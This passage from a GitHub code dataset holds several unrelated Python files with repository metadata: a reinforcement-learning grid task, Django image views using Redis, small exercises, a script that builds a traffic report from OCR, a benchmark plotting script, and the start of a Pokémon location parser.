self.name\n        return prefix + \"_h-\" + str(self.height) + \"_w-\" + str(self.width)\n\n\ndef main():\n    # Setup MDP, Agents.\n    size = 5\n    agent = {\"x\": 1, \"y\": 1, \"dx\": 1, \"dy\": 0, \"dest_x\": size, \"dest_y\": size, \"has_block\": 0}\n    blocks = [{\"x\": size, \"y\": 1}]\n    lavas = [{\"x\": x, \"y\": y} for x, y in map(lambda z: (z + 1, (size + 1) // 2), range(size))]  # \"//\" keeps the lava y-coordinate an int under Python 3\n\n    mdp = TrenchOOMDP(size, size, agent, blocks, lavas)\n    ql_agent = QLearningAgent(actions=mdp.get_actions())\n    rand_agent = RandomAgent(actions=mdp.get_actions())\n\n    # Run experiment and make plot.\n    run_agents_on_mdp([ql_agent, rand_agent], mdp, instances=30, episodes=250, steps=250)\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"david-abel/simple_rl","sub_path":"simple_rl/tasks/trench/TrenchOOMDPClass.py","file_name":"TrenchOOMDPClass.py","file_ext":"py","file_size_in_byte":9995,"program_lang":"python","lang":"en","doc_type":"code","stars":254,"dataset":"github-code","pt":"68"} +{"seq_id":"934362520","text":"from django.http import HttpResponse, JsonResponse\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom 
django.views.decorators.http import require_POST\nfrom django.contrib import messages\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.conf import settings\nimport redis\n\nfrom .forms import ImageCreateFrom\nfrom .models import Image\nfrom actions.utils import create_action\n\n# connect to Redis\nr = redis.Redis(\n host=settings.REDIS_HOST,\n port=settings.REDIS_PORT,\n db=settings.REDIS_DB,\n)\n\n\n@login_required\ndef image_create(req):\n if req.method == \"POST\":\n form = ImageCreateFrom(data=req.POST)\n if form.is_valid():\n cd = form.cleaned_data\n new_image = form.save(commit=False)\n\n new_image.user = req.user\n new_image.save()\n create_action(req.user, \"bookmarked image\", new_image)\n messages.success(req, \"Image added successfully\")\n\n return redirect(new_image.get_absolute_url())\n\n else:\n form = ImageCreateFrom(data=req.GET)\n\n return render(req, \"images/image/create.html\", {\"section\": \"images\", \"form\": form})\n\n\ndef image_detail(req, id, slug):\n image = get_object_or_404(Image, id=id, slug=slug)\n\n # increment total image views by 1\n total_views = r.incr(f\"image:{image.id}:views\")\n # increment image ranking by 1\n r.zincrby(\"image_ranking\", 1, image.id)\n\n return render(\n req,\n \"images/image/detail.html\",\n {\n \"section\": \"images\",\n \"image\": image,\n \"total_views\": total_views,\n },\n )\n\n\n@login_required\n@require_POST\ndef image_like(req):\n image_id = req.POST.get(\"id\")\n action = req.POST.get(\"action\")\n\n if image_id and action:\n try:\n image = Image.objects.get(id=image_id)\n if action == \"like\":\n image.users_like.add(req.user)\n create_action(req.user, \"likes\", image)\n else:\n image.users_like.remove(req.user)\n\n return JsonResponse({\"status\": \"ok\"})\n\n except Image.DoesNotExist:\n pass\n\n return JsonResponse({\"status\": \"error\"})\n\n\n@login_required\ndef image_list(req):\n images = Image.objects.all()\n paginator = Paginator(images, 8)\n page = req.GET.get(\"page\")\n images_only = req.GET.get(\"images_only\")\n\n try:\n images = paginator.page(page)\n except PageNotAnInteger:\n # if page is not an integer, deliver the first page\n images = paginator.page(1)\n except EmptyPage:\n if images_only:\n # if ajax request and page out of range return an empty page\n return HttpResponse(\"\")\n\n # if page out of range return last page of results\n images = paginator.page(paginator.num_pages)\n\n if images_only:\n return render(\n req,\n \"images/image/list_images.html\",\n {\"section\": \"images\", \"images\": images},\n )\n\n return render(\n req,\n \"images/image/list.html\",\n {\"section\": \"images\", \"images\": images},\n )\n\n\n@login_required\ndef image_ranking(req):\n # get image ranking dict from Redis\n img_ranking = r.zrange(\"image_ranking\", 0, -1, desc=True)[:10]\n img_ranking_ids = [int(id) for id in img_ranking]\n\n # get most viewed images\n most_viewed = list(Image.objects.filter(id__in=img_ranking_ids))\n most_viewed.sort(key=lambda x: img_ranking_ids.index(x.id))\n\n return render(\n req,\n \"images/image/ranking.html\",\n {\n \"section\": \"images\",\n \"most_viewed\": most_viewed,\n },\n )\n","repo_name":"micypac/bookmark-social","sub_path":"images/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14084163901","text":"'''Complete the findNextSquare method that finds the next integral perfect square after the one 
passed as a parameter.\nIf the parameter is itself not a perfect square then -1 should be returned. You may assume the parameter is positive.'''\n\nimport math\n\n\ndef find_next_square(sq):\n    number = int(math.sqrt(sq))\n    if number**2 != sq:\n        return -1\n    else:\n        return (number+1)**2\n\n\ndef alternative_next_square(sq):\n    return (int(math.sqrt(sq)) + 1)**2 if int(math.sqrt(sq))**2 == sq else -1\n\nprint(find_next_square(144))\nprint(find_next_square(123445))\n\nprint(alternative_next_square(16))\nprint(alternative_next_square(66))\n\n","repo_name":"EvaChitul/python_national","sub_path":"Own projects/next_perfect_square.py","file_name":"next_perfect_square.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24845137609","text":"# coding:utf-8\r\n'''\r\n@author: Sam_Shen\r\n@file: make_traffic_report.py\r\n@time: 2019/10/11 15:22\r\n@desc:\r\n\r\nRequirement: automatically generate a traffic report\r\n\r\nCustomizable:\r\n1) start date (datestart)\r\n2) end date (dateend)\r\n3) the url on 9.30\r\n\r\nWhat it does:\r\n1) scrape the traffic images from the SVR\r\n2) OCR the traffic values and work out the top 5 (misread values need manual intervention)\r\n3) import the traffic charts and the top 5 into the Word template and generate a docx\r\n\r\n2019.10.10 updates:\r\n1) open the image and click to capture the crop pixel coordinates\r\n2) updated the validation logic for machine-read traffic values\r\n\r\n2019.10.11 updates:\r\n1) trained tesserocr\r\n2) fixed the bug when a date has no matching url\r\n'''\r\n\r\n\r\nimport datetime\r\nimport os\r\nimport re\r\nimport requests\r\nfrom docx import Document\r\nfrom docx.shared import Inches\r\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\r\nfrom docx.shared import Pt\r\nfrom docx.oxml.ns import qn\r\nfrom PIL import Image\r\nimport tesserocr\r\nimport psutil\r\nimport operator\r\nimport cv2\r\nimport numpy as np\r\n\r\nclass Report:\r\n    def __init__(self):\r\n        self.base_url = \"http://172.20.9.30/20191011/graph_10346.html\"\r\n        self.base_dir = os.path.dirname(os.path.abspath(__file__))\r\n        self.img_dir = os.path.join(self.base_dir, 'img')\r\n        self.template_dir = os.path.join(self.base_dir,'template')\r\n\r\n        # adjust the following by hand as required\r\n        self.Paging = 3  # body layout: traffic charts per page\r\n        self.date_start = \"20190901\"  # start date\r\n        self.date_end = \"20190930\"  # end date\r\n\r\n\r\n    # some initialization work\r\n    def preparation(self):\r\n        # create the img directory if missing; otherwise empty it\r\n        if not os.path.isdir(self.img_dir):\r\n            os.mkdir(self.img_dir)\r\n        else:\r\n            for root, dirs, files in os.walk(self.img_dir, topdown=False):\r\n                if files:\r\n                    for name in files:\r\n                        os.remove(os.path.join(root, name))\r\n\r\n        if not os.path.isfile(os.path.join(self.template_dir,\"model.docx\")):\r\n            print('未在本地发现template目录或model.docx模板文件,请检查.')\r\n            exit(1)\r\n\r\n\r\n    # convert the url\r\n    # http://172.20.9.30/20190720/graph_12377.html becomes http://172.20.9.30/12377/graphs/graph_12377_1.png\r\n    def trans_url(self):\r\n        base_url_list = re.split('[/_.]', self.base_url)\r\n        pic_id = base_url_list[-2]\r\n        pic_date = base_url_list[-4]\r\n        pic_url = \"http://172.20.9.30/%s/graphs/graph_%s_1.png\" % (pic_date,pic_id)\r\n        return pic_url\r\n\r\n\r\n    # build the list of dates\r\n    def create_assist_date(self):\r\n        # parse into date objects\r\n        datestart = datetime.datetime.strptime(self.date_start,'%Y%m%d')\r\n        dateend = datetime.datetime.strptime(self.date_end,'%Y%m%d')\r\n        date_list = []\r\n        date_list.append(datestart.strftime('%Y%m%d'))\r\n        while datestart < dateend:\r\n            # advance the date by one day\r\n            datestart += datetime.timedelta(days=+1)\r\n            # store the date back as a string\r\n            date_list.append(datestart.strftime('%Y%m%d'))\r\n        return date_list\r\n\r\n\r\n    # build the list of image urls\r\n    def create_pic_url(self):\r\n        date_key = pic_url.split('/')[3]\r\n        pic_list = []\r\n        for date_str in date_list:\r\n            ''' pic_dict = {'date': '20190901', 'url': 
'http://172.20.9.30/20190902/graphs/graph_12328_1.png'} '''\r\n            pic_dict = {}\r\n            date_obj = datetime.datetime.strptime(date_str, '%Y%m%d')\r\n            date_obj += datetime.timedelta(days=+1)\r\n            date_add = date_obj.strftime(\"%Y%m%d\")\r\n            new_url = pic_url.replace(date_key, date_add)\r\n            pic_dict[\"date\"] = date_str\r\n            pic_dict[\"url\"] = new_url\r\n            pic_list.append(pic_dict)\r\n        return pic_list\r\n\r\n\r\n    # download the images\r\n    def download_pic(self):\r\n        for each in pic_list:\r\n            res = requests.get(each['url'])\r\n            if res.status_code == 200:\r\n                img = res.content\r\n                img_name = os.path.join(self.img_dir,each['date']+'.png')\r\n                with open(img_name,'wb' ) as f:\r\n                    f.write(img)\r\n\r\n\r\n    # get the pixel coordinates needed to crop the image\r\n    def get_pixel_coordinate(self):\r\n        img_file = os.path.join(self.img_dir,self.date_start+'.png')\r\n        img = cv2.imdecode(np.fromfile(img_file, dtype=np.uint8), cv2.IMREAD_UNCHANGED)\r\n        a = []\r\n        b = []\r\n\r\n        def on_EVENT_LBUTTONDOWN(event, x, y, flags, param):\r\n            if event == cv2.EVENT_LBUTTONDOWN:\r\n                xy = \"%d,%d\" % (x, y)\r\n                a.append(x)\r\n                b.append(y)\r\n                cv2.circle(img, (x, y), 1, (255, 0, 0), thickness=-1)\r\n                cv2.putText(img, xy, (x, y), cv2.FONT_HERSHEY_PLAIN, 1.0, (0, 0, 0), thickness=1)\r\n                cv2.imshow(\"image\", img)\r\n\r\n        h, w, l = img.shape\r\n        cv2.namedWindow(\"image\", cv2.WINDOW_NORMAL)\r\n        cv2.resizeWindow(\"image\", w * 2, h * 2)\r\n        try:\r\n            cv2.setMouseCallback(\"image\", on_EVENT_LBUTTONDOWN)\r\n            cv2.imshow(\"image\", img)\r\n            cv2.waitKey(0)\r\n            box = (a[0], b[0], a[1], b[1])\r\n            return box\r\n        except IndexError as e:\r\n            print(e,\"未在图片上选择任何坐标点\")\r\n            exit(1)\r\n\r\n\r\n    # recognize the peak traffic in each image; misread values need manual intervention\r\n    def realize_traffic(self):\r\n        traffic_list = []\r\n\r\n        # kill the process that opened the image\r\n        def close_photo():\r\n            for proc in psutil.process_iter():\r\n                if proc.name() == \"Microsoft.Photos.exe\":\r\n                    proc.kill()\r\n\r\n        # judge the accuracy of the machine-read traffic value; False means a misread that needs manual intervention\r\n        def judge_traffic(val):\r\n            val = val.replace(\" \", \"\")\r\n\r\n            # first character is not a digit\r\n            if val[0].isdigit() == False:\r\n                # print('first character is not a digit')\r\n                return False\r\n\r\n            # last character has no unit\r\n            if val[-1] not in [\"G\", \"M\", \"k\"]:\r\n                # print('missing or wrong unit at the end')\r\n                return False\r\n\r\n            # second-to-last character is a '.'\r\n            if val[-2] in [\".\"]:\r\n                # print('second-to-last character is a .')\r\n                return False\r\n\r\n            # every remaining character must be a digit or a '.'\r\n            sum = 0\r\n            for i in val[:-1]:\r\n                if i.isdigit():\r\n                    pass\r\n                elif i in [\".\"]:\r\n                    pass\r\n                else:\r\n                    # print('character is neither a digit nor .')\r\n                    sum += 1\r\n\r\n            if sum == 0:\r\n                return True\r\n            elif sum >= 1:\r\n                return False\r\n\r\n\r\n        for root, dirs, files in os.walk(self.img_dir, topdown=False):\r\n            for name in files:\r\n                traffic_dict = {}\r\n                img_files = os.path.join(root, name)\r\n                img = Image.open(img_files)\r\n\r\n                # set the crop box (x top-left, y top-left, x bottom-right, y bottom-right)\r\n                # box = (530, 228, 610, 250)\r\n\r\n                # crop the image\r\n                image = img.crop(box)\r\n                image = image.convert(\"L\")\r\n                w, h = image.size\r\n                image = image.resize((w * 2, h * 2))\r\n\r\n                # binarize the image\r\n                threshold = 180\r\n                table = []\r\n                for i in range(256):\r\n                    if i < threshold:\r\n                        table.append(0)\r\n                    else:\r\n                        table.append(1)\r\n                image = image.point(table, '1')\r\n\r\n                traffic_dict['filename'] = name\r\n                traffic = tesserocr.image_to_text(image,lang=\"num\").strip('\\n')\r\n                print(traffic)\r\n\r\n                # manual intervention for misread images\r\n                if not judge_traffic(traffic):\r\n                    image.show()\r\n                    traffic = input('File %s machine realize is %s,input normal traffic: ' % (name, traffic))\r\n                    close_photo()\r\n\r\n                traffic_dict['traffic'] = traffic.replace(\" \", \"\").upper()\r\n                traffic_list.append(traffic_dict)\r\n        return traffic_list\r\n\r\n\r\n    # compute the top 5 from the images\r\n    def 
calc_top5(self):\r\n        traffic_list_update = []\r\n\r\n        for each in traffic_list:\r\n            traffic_dict = {}\r\n            traffic_dict['filename'] = each[\"filename\"]\r\n\r\n            traffic = each[\"traffic\"]\r\n            if traffic[-1:] in [\"G\", \"g\"]:\r\n                traffic_val = float(traffic[:-1]) * 1000 * 1000\r\n            if traffic[-1:] in [\"M\", \"m\"]:\r\n                traffic_val = float(traffic[:-1]) * 1000\r\n            if traffic[-1:] in [\"K\", \"k\"]:\r\n                traffic_val = float(traffic[:-1])\r\n            traffic_dict['traffic_val'] = traffic_val\r\n            traffic_dict['traffic_show'] = traffic\r\n            traffic_list_update.append(traffic_dict)\r\n\r\n        sorted_x = sorted(traffic_list_update, key=operator.itemgetter('traffic_val'), reverse=True)\r\n        top5 = sorted_x[0:5]\r\n\r\n        '''\r\n        [{'filename': '20190906.png', 'traffic_val': 203540.0, 'traffic_show': '203.54M'}, \r\n        {'filename': '20190907.png', 'traffic_val': 186640.0, 'traffic_show': '186.64M'}, \r\n        {'filename': '20190908.png', 'traffic_val': 177610.0, 'traffic_show': '177.61M'}, \r\n        {'filename': '20190909.png', 'traffic_val': 172100.0, 'traffic_show': '172.10M'},\r\n        {'filename': '20190912.png', 'traffic_val': 166520.0, 'traffic_show': '166.52M'}\r\n        ]\r\n        '''\r\n        return top5\r\n\r\n\r\n    # generate the Word document\r\n    def create_docx(self):\r\n        document = Document(os.path.join(self.template_dir,\"model.docx\"))\r\n\r\n        def datestr_format(date_str):\r\n            date_obj = datetime.datetime.strptime(date_str, '%Y%m%d')\r\n            date_str_format = date_obj.strftime(\"%Y/%m/%d\")\r\n            return date_str_format\r\n\r\n        # add the Top5 heading\r\n        date_start_str = datestr_format(self.date_start)\r\n        date_end_str = datestr_format(self.date_end)\r\n        top5_title = \"%s - %s Top5\" % (date_start_str, date_end_str)\r\n        document.add_heading(top5_title, 0)\r\n\r\n        # add the top5 table\r\n        table = document.add_table(rows=1, cols=3)\r\n        table.style = 'Light List Accent 5'\r\n        hdr_cells = table.rows[0].cells\r\n        hdr_cells[0].text = '日期'\r\n        hdr_cells[1].text = '流量图'\r\n        hdr_cells[2].text = '最大值'\r\n\r\n        for each in top5:\r\n            row_cells = table.add_row().cells\r\n            row_cells[0].text = str(each['filename'].strip('.png'))\r\n\r\n            # add the image inside the cell\r\n            paragraph = row_cells[1].paragraphs[0]\r\n            run = paragraph.add_run()\r\n            run.add_picture(os.path.join(self.img_dir,each['filename']), width=Inches(3))\r\n\r\n            row_cells[2].text = str(each['traffic_show'])\r\n\r\n        document.add_page_break()  # add a page break\r\n\r\n        # add the body heading\r\n        daily_title = \"%s - %s Traffic Daily\" % (date_start_str, date_end_str)\r\n        document.add_heading(daily_title, 0)\r\n\r\n        # set the body font\r\n        document.styles['Normal'].font.name = u'Arial Unicode MS'\r\n        document.styles['Normal']._element.rPr.rFonts.set(qn('w:eastAsia'), u'Arial Unicode MS')\r\n        document.styles['Normal'].font.size = Pt(12)\r\n\r\n        # add the date text and image to the docx\r\n        def insert_content(date_title, img_files):\r\n            # add the date\r\n            p = document.add_paragraph(date_title)\r\n            p.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n\r\n            # add the image\r\n            # check whether the image file exists; add it if so, otherwise write a not-found note\r\n            if os.path.exists(img_files):\r\n                paragraph = document.add_paragraph()\r\n                paragraph.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n                run = paragraph.add_run(\"\")\r\n                run.add_picture(img_files, width=Inches(5.5))\r\n            else:\r\n                p = document.add_paragraph('图片404错误未找到')\r\n                p.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n\r\n            # add a line break\r\n            # p = document.add_paragraph('\\n')\r\n\r\n        num = 0\r\n        for each in date_list:\r\n            name = each+'.png'\r\n            img_files = os.path.join(self.img_dir,name)\r\n\r\n            for each in traffic_list:\r\n                if name == each['filename']:\r\n                    each_traffic = each['traffic']\r\n\r\n            date_title = 
datestr_format(name.split('.')[0]) + \" - \" + each_traffic\r\n\r\n            num += 1\r\n\r\n            # put every self.Paging charts on one page\r\n            if num % self.Paging != 0:\r\n                insert_content(date_title, img_files)\r\n\r\n            else:\r\n                insert_content(date_title, img_files)\r\n                document.add_page_break()  # add a page break\r\n\r\n        # save the file\r\n        new_report = \"model_\" + datetime.datetime.now().strftime('%Y%m%d_%H%M%S') + \".docx\"\r\n        document.save(new_report)\r\n\r\n\r\n'''Generate the September 2019 data'''\r\nreport = Report()\r\n\r\nreport.preparation()\r\npic_url = report.trans_url()\r\ndate_list = report.create_assist_date()\r\npic_list = report.create_pic_url()\r\nreport.download_pic()\r\nbox = report.get_pixel_coordinate()\r\ntraffic_list = report.realize_traffic()\r\ntop5 = report.calc_top5()\r\nreport.create_docx()","repo_name":"coolsmz/make_traffic_report","sub_path":"make_traffic_report_v5.py","file_name":"make_traffic_report_v5.py","file_ext":"py","file_size_in_byte":13528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"23770727297","text":"#!/usr/bin/env python3\n# coding: utf-8\n\n\nimport json\nimport numpy as np\nimport matplotlib.pyplot as plt\n# import sys\n# import re\nfrom decimal import Decimal\n\n\ndef May2021_read_reframe_json_and_return_dict():\n    # --- read data from reframe json report\n    # f = open('run-report_cuda.json')\n    f = open('/tmp/0/json/pilatus_weak.json')\n    d = json.load(f)\n    f.close()\n\n    # --- construct dict for plotly:\n    # my_data['cn:np_per_c:func_name': func_seconds]\n    my_data = {}\n    for myjob in d['runs'][0]['testcases']:\n        if myjob['result'] == 'success':\n            job_stdout = myjob['job_stdout']\n            for myfunc in range(0, 14):\n                # 0 Elapsed               # 1 _Elapsed\n                # 2 domain_sync           # 8 IAD\n                # 3 updateTasks           # 9 MomentumEnergyIAD\n                # 4 FindNeighbors         # 10 Timestep\n                # 5 Density               # 11 UpdateQuantities\n                # 6 EquationOfState       # 12 EnergyConservation\n                # 7 mpi_synchronizeHalos  # 13 UpdateSmoothingLength\n                cn = job_stdout.split('_')[5]\n                np_per_c = f\"{Decimal(job_stdout.split('_')[6]):.1E}\"\n                func_name = myjob['perfvars'][myfunc]['name']\n                my_key = f'{cn}:{np_per_c}:{func_name}'\n                func_seconds = myjob['perfvars'][myfunc]['value']\n                # print(my_key, func_seconds)\n                my_data[my_key] = func_seconds\n\n    return my_data\n\n\ndef May2021_create_xdata_for_plot(my_data):\n    # get dict and format it for plotly x_data\n    # https://plotly.com/python/horizontal-bar-charts/\n    # -> Color Palette for Bar Chart\n    my_func_idx = 0\n    mylist = []\n    x_data = []\n    for kk in my_data.keys():\n        cn = kk.split(':')[0]\n        # np_per_c = kk.split(':')[1]\n        # func_name = kk.split(':')[2]\n        # 2:1.0E+6:UpdateSmoothingLength 0.2407\n        if my_func_idx > 1 and cn == '1':\n            mylist.append(my_data[kk])\n        my_func_idx += 1\n        if my_func_idx == 14:\n            my_func_idx = 0\n            x_data.append(mylist)\n            mylist = []\n\n    return x_data\n\n\ndef list2percentages(ll):\n    # convert each element of the list to its % value\n    # res_l = []\n    # total = sum(ll)\n    # print(ll)\n    # for seconds in ll:\n    #     print(seconds)\n    #     ll[0] = round(seconds / total, 5)\n\n    ll = np.true_divide(ll, sum(ll))\n    # ll = np.true_divide(ll, ll.sum(axis=1, keepdims=True))\n    return ll * 100\n\n\ndef May2021_plot_mydata_as_pctg_hbar(my_data):\n    \"\"\"\n    copied from:\n    https://matplotlib.org/stable/gallery/lines_bars_and_markers/\n    horizontal_barchart_distribution.html\n    #sphx-glr-gallery-lines-bars-and-markers-horizontal-barchart-distribution-py\n    \"\"\"\n\n    category_names = ['domain_sync', 'updateTasks', 'FindNeighbors', 'Density',\n                      'EquationOfState', 'mpi_synchronizeHalos', 'IAD',\n                      
'MomentumEnergyIAD', 'Timestep', 'UpdateQuantities',\n 'EnergyConservation', 'UpdateSmoothingLength']\n\n results = {\n '$10^4$': my_data[0],\n '$10^5$': my_data[1],\n '$10^6$': my_data[2],\n }\n # 2 domain_sync\n # 3 updateTasks\n # 4 FindNeighbors\n # 5 Density\n # 6 EquationOfState\n # 7 mpi_synchronizeHalos\n # 8 IAD\n # 9 MomentumEnergyIAD\n # 10 Timestep\n # 11 UpdateQuantities\n # 12 EnergyConservation\n # 13 UpdateSmoothingLength\n\n def survey(results, category_names):\n \"\"\"\n Parameters\n ----------\n results : dict\n A mapping from question labels to a list of answers per category.\n It is assumed all lists contain the same number of entries and that\n it matches the length of *category_names*.\n category_names : list of str\n The category labels.\n \"\"\"\n labels = list(results.keys())\n data = np.array(list(results.values()))\n data_cum = data.cumsum(axis=1)\n category_colors = plt.get_cmap('RdYlGn')(\n np.linspace(0.15, 0.85, data.shape[1]))\n\n fig, ax = plt.subplots(figsize=(9.2, 5))\n ax.invert_yaxis()\n ax.xaxis.set_visible(False)\n ax.set_xlim(0, np.sum(data, axis=1).max())\n\n for i, (colname, color) in enumerate(zip(category_names,\n category_colors)):\n widths = data[:, i]\n starts = data_cum[:, i] - widths\n rects = ax.barh(labels, widths, left=starts, height=0.5,\n label=colname, color=color)\n r, g, b, _ = color\n # text_color = 'black'\n # {{{ jg ax.text -------------------------------------------------\n if min(widths) > 2:\n # fmtjg = f'{int(bar_label)}:%}'\n ax.bar_label(rects, label_type='center', color='black',\n fmt='%d%%')\n # --- adding func_name to bar_label\n for rr in rects:\n # print(rr, type(rr))\n # Rectangle(xy=(0, -0.25), width=5.6, height=0.5, angle=0)\n # Rectangle(xy=(0, 0.75), width=17.9, height=0.5, angle=0)\n # ax.text(0+(10/2)-(1*10/2), -.25+0.5, category_names[0],\n # ------> x\n # | x0,y0 x1,y0 ...\n # | x0,y1 x1,y1 ...\n # | x0,y2 x1,y2 ...\n # y\n x_text = rr.xy[0] # + rr.width / 4\n y_text = rr.xy[1] + rr._height\n ax.text(x_text, y_text, colname, rotation=-45)\n # fontsize=8)\n\n # text_color = '' if min(widths) < 2 else 'black'\n # # text_color = 'white' if r * g * b < 0.5 else 'darkgrey'\n # ax.bar_label(rects, label_type='center', color=text_color)\n # }}} ------------------------------------------------------------\n # ax.legend(ncol=len(category_names), bbox_to_anchor=(0, 1),\n ax.legend(ncol=4, bbox_to_anchor=(0, 1),\n loc='lower left', fontsize='small')\n\n return fig, ax\n\n survey(results, category_names)\n plt.show()\n\n\n# ----------------------------------------------------------------------------\n# elapsed timings (seconds, %) for each sph function call as a bar plot\n# https://matplotlib.org/stable/gallery/lines_bars_and_markers/\n# horizontal_barchart_distribution.html\nif __name__ == \"__main__\":\n my_data = May2021_read_reframe_json_and_return_dict()\n x_data = May2021_create_xdata_for_plot(my_data)\n print(x_data)\n\n # --- convert seconds (x_data) to % (x_data_percents):\n # --- not needed? 
(matplotlib does it)\n x_data_percents = []\n for ii in x_data:\n if ii:\n x_data_percents.append(np.round(list2percentages(ii), 1).tolist())\n # x_data_percents = list2percentages(ii)\n # print(\"#\", np.round(x_data_percents, 2).tolist())\n\n print(x_data_percents)\n May2021_plot_mydata_as_pctg_hbar(x_data_percents)\n # for i in newl: print(i)\n # for i in x_data[2]: print(i)\n","repo_name":"jgphpc/jgphpc","sub_path":"python/matplotlib/reframe37_jg.py","file_name":"reframe37_jg.py","file_ext":"py","file_size_in_byte":7145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"37118512681","text":"def match(str, pat, dict, i=0, j=0):\n\tn = len(str)\n\tm = len(pat)\n\tif n < m:\n\t\treturn False\n\tif i == n and j == m:\n\t\treturn True\n\tif i == n or j == m:\n\t\treturn False\n\tcurr = pat[j]\n\tif curr in dict:\n\t\ts = dict[curr]\n\t\tk = len(s)\n\t\tif i + k < len(str):\n\t\t\tss = str[i:i + k]\n\t\telse:\n\t\t\tss = str[i:]\n\t\tif ss != s:\n\t\t\treturn False\n\t\treturn match(str, pat, dict, i + k, j + 1)\n\tfor k in range(1, n - i + 1):\n\t\tdict[curr] = str[i:i + k]\n\t\tif match(str, pat, dict, i + k, j + 1):\n\t\t\treturn True\n\t\tdict.pop(curr)\n\treturn False\n\ndef pattern_detector(a,b):\n\tdict = {} \n\tif match(a, b, dict):\n\t\treturn \"Yes\"\n\telse:\n\t return \"No\"\n\ndef main():\n k = input()\n res = []\n for i in range(int(k)):\n a = input()\n b = input()\n res.append(pattern_detector(a,b))\n for i in res:\n print(i)\n\n\nmain()\n\n\n","repo_name":"NavidDehban/Pattern-Detection","sub_path":"Pattern detection.py","file_name":"Pattern detection.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"20861914631","text":"import glob\nimport os\nimport sys\nimport re\nfrom pyuca import Collator\n\nroot_path = \"D:/Poképédia/Robot\"\nif len(sys.argv) > 1:\n\troot_path = sys.argv[1]\n\nprint(\"Python root_path [\"+root_path+\"]\")\n\nos.chdir(root_path)\n\nc = Collator()\n\nfoldername = \"dumps/locdump/\"\nseen_games = set()\nlocations = {}\nwarnings = \"\"\n\ngame_to_game_long = {\n\t\"RV\":\t\t\t\"Pokémon Rouge et Vert\",\n\t\"B-JP\":\t\t\t\"Pokémon Bleu (Japon)\",\n\t\"RB\":\t\t\t\"Pokémon Rouge et Bleu\",\n\t\"J\":\t\t\t\"Pokémon Jaune\",\n\t\"O\":\t\t\t\"Pokémon Or\",\n\t\"A\":\t\t\t\"Pokémon Argent\",\n\t\"OA\":\t\t\t\"Pokémon Or et Argent\",\n\t\"C\":\t\t\t\"Pokémon Cristal\",\n\t\"RS\":\t\t\t\"Pokémon Rubis et Saphir\",\n\t\"RFVF\":\t\t\t\"Pokémon Rouge Feu et Vert Feuille\",\n\t\"E\":\t\t\t\"Pokémon Émeraude\",\n\t\"DP\":\t\t\t\"Pokémon Diamant et Perle\",\n\t\"HGSS\":\t\t\t\"Pokémon Or HeartGold et Argent SoulSilver\",\n\t\"Pt\":\t\t\t\"Pokémon Platine\",\n\t\"NB\":\t\t\t\"Pokémon Noir et Blanc\",\n\t\"NB2\":\t\t\t\"Pokémon Noir 2 et Blanc 2\",\n\t\"XY\":\t\t\t\"Pokémon X et Y\",\n\t# \"Démo-ROSA\":\t\"Pokémon Rubis Oméga et Saphir Alpha _ Version démo spéciale\",\n\t\"ROSA\":\t\t\t\"Pokémon Rubis Oméga et Saphir Alpha\",\n\t\"SL\":\t\t\t\"Pokémon Soleil et Lune\",\n\t\"USUL\":\t\t\t\"Pokémon Ultra-Soleil et Ultra-Lune\",\n\t\"LGPE\":\t\t\t\"Pokémon Let's Go, Pikachu et Let's Go, Évoli\",\n\t\"EB\":\t\t\t\"Pokémon Épée et Bouclier\",\n\t\"DEPS\":\t\t\t\"Pokémon Diamant Étincelant et Perle Scintillante\",\n\t\"LPA\":\t\t\t\"Légendes Pokémon _ Arceus\",\n\t\"EV\":\t\t\t\"Pokémon Écarlate et Violet\"\n}\n\ndef get_savepath(game):\n\ttry:\n\t\treturn \"dumps/locdump_converted/\" + game_to_game_long[game] + 
\".txt\"\n\texcept KeyError:\n\t\treturn None\n\n# Directory cleaning\ndirectory = \"dumps/locdump_converted/\"\ntry:\n\tif not os.path.exists(directory):\n\t\tos.makedirs(directory)\n\telse:\n\t\tfiles = [glob.glob(directory + \"*.txt\", recursive=True)]\n\n\t\tfor d in files:\n\t\t\tfor f in d:\n\t\t\t\ttry:\n\t\t\t\t\tos.remove(f)\n\t\t\t\texcept OSError as e:\n\t\t\t \t\tprint(\"Error: %s : %s\" % (f, e.strerror))\n\nexcept OSError as e:\n\tprint(e.strerror)\n\nprint(\"Parsing locations...\")\n\nfilenames = sorted(os.listdir(foldername), key=str.casefold)\nfor filename in filenames:\n\tfile = open(foldername + filename, \"r\", encoding=\"utf-8\")\n\n\tlocation = filename[:-4] \t#get rid of the '.txt'\n\t\n\t# print(\"Parsing \" + location + \"...\")\n\n\tlines = file.readlines()\n\tans = \"\"\n\tmilieu = None\n\tstarted = False\n\tstarted_raid = False\n\tfirst_line = True\n\tinfo_dict_dict = {}\n\n\tfor line in lines:\n\t\tif not started and not started_raid:\n\t\t\tif \"{{#invoke:Tableau Pokémon|sauvage\" in line:\n\t\t\t\tgame_parameter = \"|jeu=\"\n\t\t\t\tlocation_parameter = \"|lieu=\"\n\t\t\t\tzone_parameter = \"|zone=\"\n\t\t\t\tbeg = line.find(game_parameter)\n\t\t\t\tend = line.find(\"|\", beg + 1)\n\t\t\t\tgame = line[beg + len(game_parameter):end]\n\n\t\t\t\tbeg = line.find(location_parameter)\n\t\t\t\tif beg == -1:\n\t\t\t\t\tlocation_specified = location\n\t\t\t\telse:\n\t\t\t\t\tend = line.find(\"|\", beg + 1)\n\t\t\t\t\tlocation_specified = location + \"|\" + line[beg + len(location_parameter):end]\n\n\t\t\t\tbeg = line.find(zone_parameter)\n\t\t\t\tif beg == 